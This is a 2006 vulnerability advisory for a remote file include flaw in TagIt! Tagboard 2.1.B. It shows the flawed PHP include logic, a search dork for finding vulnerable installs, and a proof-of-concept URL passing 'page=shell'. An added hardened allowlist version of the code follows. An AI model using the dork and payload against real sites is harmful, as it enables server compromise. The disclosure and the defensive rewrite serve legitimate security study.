# Title : TagIt! Tagboard <= 2.1.b b2 (index.php) Remote File Include Vulnerability
# Published : 2006-09-28
# Author : Kernel-32


Tagmin C.C 2.1.B Remote File Include
########################################
+Advisory #3
+Product: Tagmin Control Center 2.1.B
+Develop: http://ds3.bbminc.net/tagit2b/
+Dork: inurl:"/tagit2b/"
+Vulnerable: Remote File Include
+Risk: High
+Discovered by: Kernel-32
+Contact: kernel-32@linuxmail.org
+Homepage: http://kernel-32.blogspot.com
+Greetz: BeLa ;)
########################################
Vulnerable code:
----------------
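// isset() guards only the "dtu" comparison, because && binds tighter than "or".
if(isset($_GET['load']) && $_GET['load'] == "dtu" or $_GET['load'] == "tag") {
    // $page is not assigned in this excerpt; it is assumed to come from the
    // request (register_globals), so the caller chooses the included file.
    include("$page.php");
}
else {
    include("tagviewer.php");
}
?>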

---------------
Vulnerable:
http://site/path/index.php?page=shell
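
Added example, not part of the original advisory or of the TagIt! code: a hardened form of the include logic above, in which the included file is picked from a fixed allowlist instead of being built from a request value. It assumes $page reaches the script from the request (for example via register_globals); the resolve_page() helper, the allowlisted file names and the sample queries are hypothetical.

```php
<?php
// Hardened include selection (added example, not the project's code).
// Defence in depth in php.ini: allow_url_include = Off, and
// register_globals = Off on PHP versions that still have it.

// Fixed allowlist: request value => local file. File names are hypothetical.
const ALLOWED_PAGES = [
    'dtu' => 'dtu.php',
    'tag' => 'tag.php',
];

const DEFAULT_PAGE = 'tagviewer.php';

// Returns the file to include. Request data is only ever used as a lookup
// key, never as part of the path handed to include.
function resolve_page(array $query): string
{
    $load = $query['load'] ?? null;
    $page = $query['page'] ?? null;

    // Both comparisons sit behind the same type check, unlike the original
    // condition where isset() covered only the first one.
    if (!is_string($load) || !in_array($load, ['dtu', 'tag'], true)) {
        return DEFAULT_PAGE;
    }
    if (!is_string($page) || !array_key_exists($page, ALLOWED_PAGES)) {
        return DEFAULT_PAGE;
    }
    return ALLOWED_PAGES[$page];
}

// In index.php the result would be used as:
//   include __DIR__ . '/' . resolve_page($_GET);

// Constructed sample queries, run through the resolver offline.
$samples = [
    ['page' => 'shell'],                              // value from the advisory
    ['load' => 'tag', 'page' => 'not-on-the-list'],   // unknown page name
    ['load' => ['tag'], 'page' => 'tag'],             // array instead of string
    ['load' => 'dtu', 'page' => 'dtu'],               // legitimate request
];
foreach ($samples as $query) {
    echo json_encode($query), ' => ', resolve_page($query), PHP_EOL;
}
```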
